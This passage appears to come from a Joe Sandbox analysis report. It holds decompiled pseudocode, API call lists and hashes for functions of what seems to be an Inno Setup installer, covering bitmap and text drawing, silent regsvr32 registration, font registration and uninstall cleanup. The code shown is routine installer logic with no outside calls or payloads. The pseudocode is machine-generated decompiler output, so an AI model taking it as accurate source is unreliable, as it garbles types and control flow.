					return  *((intOrPtr*)( *_t162 + 0xc))( *((intOrPtr*)(E0041D0B8(_t89, _t147, _t154) + 4)), 0, 0, _v16, _v20,  *(E0041D0B8(_v8, _t147, _t154) + 4),  *_t160, _t160[1], 0xcc0020);
				}
				return __eax;
			}

0x0041a8c4
0x0041a8cd
0x0041a8d0
0x0041a8d2
0x0041a8d4
0x0041a8db
0x0041a8e5
0x0041a8ed
0x0041a8f6
0x0041a8f9
0x0041a901
0x0041a90d
0x0041a91b
0x0041a922
0x0041a927
0x0041a927
0x0041a92c
0x0041a939
0x0041a93e
0x0041a943
0x0041a945
0x0041a945
0x0041a948
0x0041a94d
0x0041a955
0x0041a957
0x0041a95a
0x0041a95f
0x0041a961
0x0041a961
0x0041a964
0x0041a969
0x0041a96e
0x0041a974
0x0041a97c
0x0041a981
0x0041a987
0x0041a98f
0x0041a9a6
0x0041a9cd
0x0041a9db
0x0041a9f0
0x0041a9f5
0x0041a9fd
0x0041aa3a
0x0041aa45
0x0041aa5a
0x0041aa6e
0x0041aa94
0x0041aa9e
0x0041aaab
0x00000000
0x0041aab4
0x0041aabd

APIs

SetBkColor.GDI32(?,00000000), ref: 0041A9A1
740C97E0.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041A9DB
SetBkColor.GDI32(?,?), ref: 0041A9F0
StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA3A
SetTextColor.GDI32(00000000,00000000), ref: 0041AA45
SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA55
StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AA94
SetTextColor.GDI32(00000000,00000000), ref: 0041AA9E
SetBkColor.GDI32(00000000,?), ref: 0041AAAB

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Color$StretchText
String ID:
API String ID: 2984075790-0
Opcode ID: 38b5d4050403801e172c9c725a2e8373fb0560301b4b766f6ce379770849aa6d
Instruction ID: 63a48f429e4cd2ff6867a160972251f173ae3d0b3502bd4ccc057afcf8cfd419
Opcode Fuzzy Hash: 38b5d4050403801e172c9c725a2e8373fb0560301b4b766f6ce379770849aa6d
Instruction Fuzzy Hash: 2E61E7B5A00104AFCB40EFADD985E9AB7F8AF09314B54816AF518DB361CB34ED44CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00456F0C Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00456F0C(char __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				char _v5;
				char _v12;
				char _v16;
				char _v84;
				void* _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				void* _t57;
				void* _t92;
				char _t93;
				intOrPtr _t110;
				void* _t121;
				void* _t124;

				_t119 = __edi;
				_t94 = __ecx;
				_push(__edi);
				_v104 = 0;
				_v108 = 0;
				_v12 = 0;
				_v16 = 0;
				_t121 = __ecx;
				_t92 = __edx;
				_v5 = __eax;
				_push(_t124);
				_push(0x4570a8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t124 + 0xffffff90;
				E0042D868( &_v12);
				_push(0x4570c0);
				E0042C3E4(_v12,  &_v104);
				_push(_v104);
				_push("regsvr32.exe\"");
				E00403634();
				if(_v5 != 0) {
					E0040357C( &_v16, 0x4570e4);
				}
				_push(_v16);
				_push(" /s "");
				_push(_t121);
				_push(0x4570c0);
				E00403634();
				_t127 = _t92;
				if(_t92 == 0) {
					E00403494( &_v104, "Spawning 32-bit RegSvr32: ");
					E0040357C( &_v104, _v16);
					E00456B58(_v104, _t92, _t94, _t119, _t121);
				} else {
					E00403494( &_v104, "Spawning 64-bit RegSvr32: ");
					E0040357C( &_v104, _v16);
					E00456B58(_v104, _t92, _t94, _t119, _t121);
				}
				E00402934( &_v84, 0x44);
				_v84 = 0x44;
				_t57 = E00403738(_v12);
				if(E00451B48(_t92, E00403738(_v16), 0, _t127,  &_v100,  &_v84, _t57, 0, 0x4000000, 0, 0, 0) == 0) {
					E004527FC("CreateProcess");
				}
				CloseHandle(_v96);
				_t93 = E00456E40( &_v100);
				if(_t93 != 0) {
					_v116 = _t93;
					_v112 = 0;
					E004078D4(0x457160, 0,  &_v116,  &_v108);
					E004507B8(0x3e,  &_v104, _v108);
					E00408BEC(_v104, 1);
					E0040311C();
				}
				_pop(_t110);
				 *[fs:eax] = _t110;
				_push(E004570AF);
				E00403420( &_v108, 2);
				return E00403420( &_v16, 2);
			}

0x00456f0c
0x00456f0c
0x00456f14
0x00456f17
0x00456f1a
0x00456f1d
0x00456f20
0x00456f23
0x00456f25
0x00456f27
0x00456f2c
0x00456f2d
0x00456f32
0x00456f35
0x00456f3b
0x00456f40
0x00456f4b
0x00456f50
0x00456f53
0x00456f60
0x00456f69
0x00456f73
0x00456f73
0x00456f78
0x00456f7b
0x00456f80
0x00456f81
0x00456f8e
0x00456f93
0x00456f95
0x00456fc1
0x00456fcc
0x00456fd4
0x00456f97
0x00456f9f
0x00456faa
0x00456fb2
0x00456fb2
0x00456fe3
0x00456fe8
0x00456fff
0x00457022
0x00457029
0x00457029
0x00457032
0x0045703f
0x00457043
0x00457049
0x0045704c
0x0045705a
0x00457067
0x00457076
0x0045707b
0x0045707b
0x00457082
0x00457085
0x00457088
0x00457095
0x004570a7

APIs

Part of subcall function 0042D868: GetSystemDirectoryA.KERNEL32 ref: 0042D87B

CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,004570C0,?, /s ",?,regsvr32.exe",?,004570C0), ref: 00457032

Strings

D, xrefs: 00456FE8
/s ", xrefs: 00456F7B
/u, xrefs: 00456F6E
Spawning 64-bit RegSvr32: , xrefs: 00456F97
CreateProcess, xrefs: 00457024
regsvr32.exe", xrefs: 00456F53
0x%x, xrefs: 00457055
Spawning 32-bit RegSvr32: , xrefs: 00456FB9

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseDirectoryHandleSystem
String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
API String ID: 2051275411-1862435767
Opcode ID: fb5f62bd63eaf3dbb40ffd930a477ba7d9b9fa7e28ba8de972149f19ce64a002
Instruction ID: 6f4624668567d04d9f49a5e2cff64df5633838e788db9f5cb64e7bec1705c311
Opcode Fuzzy Hash: fb5f62bd63eaf3dbb40ffd930a477ba7d9b9fa7e28ba8de972149f19ce64a002
Instruction Fuzzy Hash: 7641F570E043086BDB11EFD6D842B8EF7F9AF48705F50407BA904BB292D7789A09CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0044C7B0 Relevance: 13.6, APIs: 9, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044C7B0(void* __eax, int __ecx, struct tagRECT* __edx, char _a4, intOrPtr _a8) {
				int _t23;
				CHAR* _t25;
				long _t37;
				int _t44;
				CHAR* _t46;
				long _t53;
				int _t60;
				CHAR* _t62;
				void* _t68;

				_t72 = __ecx;
				_t73 = __edx;
				_t68 = __eax;
				_t74 = _a4;
				if(_a4 == 0) {
					_t23 = E00403574(__eax);
					_t25 = E00403738(_t68);
					return DrawTextA(E0041B07C( *((intOrPtr*)( *((intOrPtr*)(_a8 - 4)) + 0x104))), _t25, _t23, __edx, __ecx);
				}
				E0041A74C( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a8 - 4)) + 0x104)) + 0x14)), 1, _t74);
				OffsetRect(_t73, 1, 1);
				_t37 = GetSysColor(0x14);
				SetTextColor(E0041B07C( *((intOrPtr*)( *((intOrPtr*)(_a8 - 4)) + 0x104))), _t37);
				_t44 = E00403574(_t68);
				_t46 = E00403738(_t68);
				DrawTextA(E0041B07C( *((intOrPtr*)( *((intOrPtr*)(_a8 - 4)) + 0x104))), _t46, _t44, _t73, _t72);
				OffsetRect(_t73, 0xffffffff, 0xffffffff);
				_t53 = GetSysColor(0x10);
				SetTextColor(E0041B07C( *((intOrPtr*)( *((intOrPtr*)(_a8 - 4)) + 0x104))), _t53);
				_t60 = E00403574(_t68);
				_t62 = E00403738(_t68);
				return DrawTextA(E0041B07C( *((intOrPtr*)( *((intOrPtr*)(_a8 - 4)) + 0x104))), _t62, _t60, _t73, _t72);
			}

0x0044c7b6
0x0044c7b8
0x0044c7ba
0x0044c7bc
0x0044c7c0
0x0044c886
0x0044c88e
0x00000000
0x0044c8a6
0x0044c7d7
0x0044c7e1
0x0044c7e8
0x0044c800
0x0044c809
0x0044c811
0x0044c829
0x0044c833
0x0044c83a
0x0044c852
0x0044c85b
0x0044c863
0x00000000

APIs

OffsetRect.USER32(?,00000001,00000001), ref: 0044C7E1
GetSysColor.USER32(00000014), ref: 0044C7E8
SetTextColor.GDI32(00000000,00000000), ref: 0044C800
DrawTextA.USER32(00000000,00000000,00000000), ref: 0044C829
OffsetRect.USER32(?,000000FF,000000FF), ref: 0044C833
GetSysColor.USER32(00000010), ref: 0044C83A
SetTextColor.GDI32(00000000,00000000), ref: 0044C852
DrawTextA.USER32(00000000,00000000,00000000), ref: 0044C87B
DrawTextA.USER32(00000000,00000000,00000000), ref: 0044C8A6

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Text$Color$Draw$OffsetRect
String ID:
API String ID: 1005981011-0
Opcode ID: 6c011d19962720c57f99ae84a11f68fd831fc3d5b21fd9a0ea075dcccbe307de
Instruction ID: c72cc10e2be09a409883ce0e42f01e50c9e9a547a85b78d8368daa7df0bb7860
Opcode Fuzzy Hash: 6c011d19962720c57f99ae84a11f68fd831fc3d5b21fd9a0ea075dcccbe307de
Instruction Fuzzy Hash: CB21C0B4201500BFC710FB2ACD8AE9BBBDCDF19319B00457A7954EB3A3C678DD408669

Uniqueness

Uniqueness Score: -1.00%

Function 0047638C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 92
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0047638C(char __eax, intOrPtr __ecx, intOrPtr* __edx, void* __edi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v10;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				signed int _v32;
				void* __ebx;
				void* __esi;
				void* __ebp;
				struct HWND__* _t28;
				long _t36;
				void* _t41;
				signed short _t45;
				signed short _t47;
				signed int _t50;
				signed int _t58;
				long _t59;
				void* _t73;
				intOrPtr* _t74;
				signed short _t76;

				_t73 = __edi;
				_t62 = __ecx;
				_v8 = __ecx;
				_t74 = __edx;
				_v24 = __eax;
				_v20 = E0040CC24( *__edx);
				_v16 =  *((intOrPtr*)( *_t74 + 4));
				E004762B4(_t62);
				_t6 =  &_v24; // 0x476746
				_t28 =  *0x49b07c; // 0x0
				_t58 = SendMessageA(_t28, 0x4a, 0, _t6);
				E0042E284(_t74);
				if(_t58 == 0x6c840001) {
					E00408BE0();
				}
				if((_t58 & 0xffff0000) != 0x6c830000) {
					_v32 = _t58;
					_v28 = 0;
					E00452700("CallSpawnServer: Unexpected response: $%x", _t58, 0,  &_v32, _t73, _t74, 0);
				}
				_v10 = _t58;
				_t59 = GetTickCount();
				while(1) {
					_v8();
					_t36 = GetTickCount();
					if(_t36 - _t59 < 0xa) {
						goto L9;
					}
					_t59 = _t36;
					_t76 = E00476310(_v10);
					_t41 = _t76 - 2;
					if(_t41 == 0) {
						goto L9;
					}
					if(_t41 - 0xffffffffffffffff >= 0) {
						_v32 = _t76 & 0x0000ffff;
						_v28 = 0;
						E00452700("CallSpawnServer: Unexpected status: %d", _t59, 0,  &_v32, _t73, _t76, 0);
						goto L9;
					}
					_t45 = E00476310(_v10);
					_t47 = E00476310(_v10);
					_t50 = _a4;
					 *_t50 = _t45 & 0x0000ffff | (_t47 & 0x0000ffff) << 0x00000010;
					__eflags = _t76 - 3;
					_t20 = _t76 == 3;
					__eflags = _t20;
					return _t50 & 0xffffff00 | _t20;
					L9:
					MsgWaitForMultipleObjects(0, 0, 0, 0xa, 0xff);
				}
			}

0x0047638c
0x0047638c
0x00476394
0x00476397
0x00476399
0x004763a3
0x004763ab
0x004763ae
0x004763b3
0x004763bb
0x004763c6
0x004763ca
0x004763d5
0x004763d7
0x004763d7
0x004763e8
0x004763ea
0x004763ed
0x004763fb
0x004763fb
0x00476400
0x0047640b
0x0047640d
0x0047640d
0x00476410
0x0047641c
0x00000000
0x00000000
0x0047641e
0x0047642e
0x00476432
0x00476436
0x00000000
0x00000000
0x0047643d
0x00476442
0x00476445
0x00476453
0x00000000
0x00476453
0x00476475
0x00476486
0x00476493
0x00476496
0x00476498
0x0047649c
0x0047649c
0x004764a4
0x00476458
0x00476465
0x00476465

APIs

Part of subcall function 004762B4: GetWindowThreadProcessId.USER32(00000000), ref: 004762BC
Part of subcall function 004762B4: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,004763B3,0049B048,00000000), ref: 004762CF
Part of subcall function 004762B4: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 004762D5

SendMessageA.USER32 ref: 004763C1
GetTickCount.KERNEL32 ref: 00476406
GetTickCount.KERNEL32 ref: 00476410
MsgWaitForMultipleObjects.USER32 ref: 00476465

Strings

FgG, xrefs: 004763B3, 004763B6
CallSpawnServer: Unexpected response: $%x, xrefs: 004763F6
CallSpawnServer: Unexpected status: %d, xrefs: 0047644E

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d$FgG
API String ID: 613034392-1066121646
Opcode ID: 3b15cde9995cb4c834448d30b37f698f3a967a892eb488c2920af7ea1ebb9a11
Instruction ID: 7b3989facecf81d8293a7ad44f2bcadc878152026df19698122e79260123aea6
Opcode Fuzzy Hash: 3b15cde9995cb4c834448d30b37f698f3a967a892eb488c2920af7ea1ebb9a11
Instruction Fuzzy Hash: FF31C434B006149ADB10EBB9C8867EE76A69F04304F51843BF548EB382DB7C8D058B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00494784 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90
sleepsynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00494784(void* __eflags) {
				long _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t7;
				intOrPtr _t9;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t21;
				struct HWND__* _t28;
				void* _t34;
				struct HWND__* _t35;
				void* _t36;
				intOrPtr _t42;
				void* _t43;
				void* _t44;
				intOrPtr _t46;

				E00456B58("Deleting Uninstall data files.", _t34, _t36, _t43, _t44);
				_push(0x4947c3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46;
				_t7 =  *0x49b45c; // 0x0
				E0044FA50(_t7, 0);
				_t9 =  *0x49b45c; // 0x0
				E0044FC8C(_t9);
				 *[fs:eax] = 0;
				E0042E284(0x49b45c);
				_t14 =  *0x49b454; // 0x0
				E00406F30(_t14);
				_t16 =  *0x49b458; // 0x0
				E00406F30(_t16);
				if( *0x49b474 != 0) {
					if( *0x49b470 == 0) {
						_t35 =  *0x49b474; // 0x0
					} else {
						_t35 =  *0x49b470; // 0x0
					}
					_v8 = 0;
					if(GetWindowThreadProcessId(_t35,  &_v8) == 0) {
						_t34 = 0;
						__eflags = 0;
					} else {
						_t34 = OpenProcess(0x100000, 0, _v8);
					}
					_t28 =  *0x49b474; // 0x0
					SendNotifyMessageA(_t28, 0x54d, 0, 0);
					if(_t34 != 0) {
						WaitForSingleObject(_t34, 0xffffffff);
						CloseHandle(_t34);
					}
					if( *0x49afac == 0) {
						Sleep(0x1f4);
					}
				}
				 *0x499088 = 0;
				_t42 =  *0x49b450; // 0x0
				E00454890(0, _t42, 0xfa, 0x32);
				if( *0x49afac != 0) {
					E00456364(0, _t34, _t43, _t44, 0);
				}
				_t21 =  *0x49a628; // 0x2262410
				return E00424228(_t21);
			}

0x00494790
0x00494798
0x0049479d
0x004947a0
0x004947a5
0x004947aa
0x004947af
0x004947b4
0x004947be
0x004947d2
0x004947d7
0x004947dc
0x004947e1
0x004947e6
0x004947f2
0x004947fb
0x00494805
0x004947fd
0x004947fd
0x004947fd
0x0049480d
0x0049481c
0x00494832
0x00494832
0x0049481e
0x0049482e
0x0049482e
0x0049483d
0x00494843
0x0049484a
0x0049484f
0x00494855
0x00494855
0x00494861
0x00494868
0x00494868
0x00494861
0x0049486f
0x00494880
0x00494888
0x00494894
0x00494898
0x00494898
0x0049489d
0x004948ac

APIs

Part of subcall function 0044FC8C: SetEndOfFile.KERNEL32(?,?,0045B6DE,00000000,0045B869,?,00000000,00000002,00000002), ref: 0044FC93

Part of subcall function 00406F30: DeleteFileA.KERNEL32(00000000,0049A628,004969ED,00000000,00496A42,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F3B

GetWindowThreadProcessId.USER32(00000000,?), ref: 00494815
OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00494829
SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00494843
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 0049484F
CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494855
Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494868

Strings

Deleting Uninstall data files., xrefs: 0049478B

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
String ID: Deleting Uninstall data files.
API String ID: 1570157960-2568741658
Opcode ID: c58aef7eaac53519f74c95c14b6872013d10a74768e9d0732705ad0039b25506
Instruction ID: d22b71c71f8c218356d39921f4efba8aa632f2c0e28d985d4fe56f9575ee7d0e
Opcode Fuzzy Hash: c58aef7eaac53519f74c95c14b6872013d10a74768e9d0732705ad0039b25506
Instruction Fuzzy Hash: F021B130300644AEEB10EBB6ED82F573798EB94708F10453BF5009A293DB78AC02DA6D

Uniqueness

Uniqueness Score: -1.00%

Function 0046EE58 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 89
registrywindowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0046EE58(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _v8;
				char _v12;
				char _v16;
				void* _t31;
				void* _t34;
				char* _t37;
				void* _t47;
				intOrPtr _t55;
				intOrPtr _t59;
				void* _t63;
				intOrPtr _t66;

				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t47 = __ecx;
				_t61 = __edx;
				_t63 = __eax;
				_push(_t66);
				_push(0x46ef55);
				_push( *[fs:eax]);
				 *[fs:eax] = _t66;
				_t49 =  *0x00498BA0;
				if(E0042DD1C(0,  *0x00498BA0, 0x80000002,  &_v8, 2, 0) != 0) {
					E00456B58("Failed to open Fonts registry key.", __ecx, _t49, __edx, _t63);
				} else {
					_t34 = E00403574(_t63);
					_t37 = E00403738(_t63);
					if(RegSetValueExA(_v8, E00403738(__edx), 0, 1, _t37, _t34 + 1) != 0) {
						E00456B58("Failed to set value in Fonts registry key.", _t47, _t49, _t61, _t63);
					}
					RegCloseKey(_v8);
				}
				if(_t47 != 0) {
					while(AddFontResourceA(E00403738(_t63)) == 0) {
						_t52 =  &_v16;
						E004507B8(0x33,  &_v16, "AddFontResource");
						E0042E5AC(_v16,  &_v16,  &_v12);
						_t59 =  *0x49acd8; // 0x227ccfc
						_t31 = E0046D1C0(_v12, _t47, _t52, _t59, _t61, _t63, __eflags);
						__eflags = _t31;
						if(_t31 == 0) {
							continue;
						}
						goto L9;
					}
					SendNotifyMessageA(0xffff, 0x1d, 0, 0);
				}
				L9:
				_pop(_t55);
				 *[fs:eax] = _t55;
				_push(0x46ef5c);
				return E00403420( &_v16, 2);
			}

0x0046ee5b
0x0046ee5d
0x0046ee5f
0x0046ee61
0x0046ee62
0x0046ee63
0x0046ee64
0x0046ee66
0x0046ee68
0x0046ee6c
0x0046ee6d
0x0046ee72
0x0046ee75
0x0046ee87
0x0046ee9c
0x0046eee2
0x0046ee9e
0x0046eea0
0x0046eea9
0x0046eec6
0x0046eecd
0x0046eecd
0x0046eed6
0x0046eed6
0x0046eee9
0x0046eeeb
0x0046ef0e
0x0046ef18
0x0046ef23
0x0046ef2b
0x0046ef31
0x0046ef36
0x0046ef38
0x00000000
0x00000000
0x00000000
0x0046ef38
0x0046ef07
0x0046ef07
0x0046ef3a
0x0046ef3c
0x0046ef3f
0x0046ef42
0x0046ef54

APIs

Part of subcall function 0042DD1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481B1F,?,00000001,?,?,00481B1F,?,00000001,00000000), ref: 0042DD38

RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046EF55,?,?,?,?,00000000), ref: 0046EEBF
RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046EF55), ref: 0046EED6
AddFontResourceA.GDI32(00000000), ref: 0046EEF3
SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0046EF07

Strings

AddFontResource, xrefs: 0046EF11
Failed to set value in Fonts registry key., xrefs: 0046EEC8
Failed to open Fonts registry key., xrefs: 0046EEDD

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseFontMessageNotifyOpenResourceSendValue
String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
API String ID: 955540645-649663873
Opcode ID: b58a6713cf2b628141ce647b62da523a74dfd9e7e154268a3893981cc93bc562
Instruction ID: 1e4eef1652d92c2a0097eb18b0e556d5c5c9769271b4b4c2730dbdd0d559fb1f
Opcode Fuzzy Hash: b58a6713cf2b628141ce647b62da523a74dfd9e7e154268a3893981cc93bc562
Instruction Fuzzy Hash: 9A2192787402047BEB10EA678C42F5A67DDDB15708F604437B900EB2C2EA7DED02966E

Uniqueness

Uniqueness Score: -1.00%

Function 004621D4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E004621D4(intOrPtr* __eax, void* __ecx, void* __edx, void* __edi, void* __eflags) {
				struct HICON__* _v8;
				struct _SHFILEINFO _v360;
				void* __esi;
				void* __ebp;
				void* _t14;
				int _t18;
				intOrPtr* _t37;
				void* _t49;
				void* _t53;
				void* _t55;
				intOrPtr _t56;

				_t53 = _t55;
				_t56 = _t55 + 0xfffffe9c;
				_push(_t49);
				_t37 = __eax;
				 *((char*)(__eax + 0xfc)) = 0;
				E004163F8(__eax, __edi, _t49, _t53);
				_t14 = E00403400(_t37 + 0x100);
				if(( *(_t37 + 0x1c) & 0x00000010) != 0) {
					return _t14;
				} else {
					if((GetVersion() & 0x000000ff) >= 6 &&  *0x49a70c != 0) {
						 *0x49a70c(E004181C8(_t37), L"Explorer", 0);
						SendMessageA(E004181C8(_t37), 0x112c, 4, 4);
					}
					_t18 = SHGetFileInfo(0x4622e0, 0,  &_v360, 0x160, 0x4011);
					E00409A30(E004181C8(_t37), 0, _t18);
					_v8 = SetCursor(LoadCursorA(0, 0x7f02));
					 *[fs:eax] = _t56;
					 *((intOrPtr*)( *_t37 + 0x80))( *[fs:eax], 0x4622bc, _t53);
					 *[fs:eax] = 0;
					_push(0x4622c3);
					return SetCursor(_v8);
				}
			}

0x004621d5
0x004621d7
0x004621de
0x004621df
0x004621e1
0x004621ea
0x004621f5
0x004621fe
0x004622c8
0x00462204
0x00462211
0x0046222b
0x00462242
0x00462242
0x0046225f
0x00462271
0x00462288
0x00462296
0x0046229f
0x004622aa
0x004622ad
0x004622bb
0x004622bb

APIs

Part of subcall function 004163F8: GetClassInfoA.USER32 ref: 00416467
Part of subcall function 004163F8: UnregisterClassA.USER32 ref: 00416493
Part of subcall function 004163F8: RegisterClassA.USER32 ref: 004164B6

GetVersion.KERNEL32 ref: 00462204
SendMessageA.USER32 ref: 00462242
SHGetFileInfo.SHELL32(004622E0,00000000,?,00000160,00004011), ref: 0046225F
LoadCursorA.USER32 ref: 0046227D
SetCursor.USER32(00000000,00000000,00007F02,004622E0,00000000,?,00000160,00004011), ref: 00462283
SetCursor.USER32(?,004622C3,00007F02,004622E0,00000000,?,00000160,00004011), ref: 004622B6

Strings

Explorer, xrefs: 0046221E

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
String ID: Explorer
API String ID: 2594429197-512347832
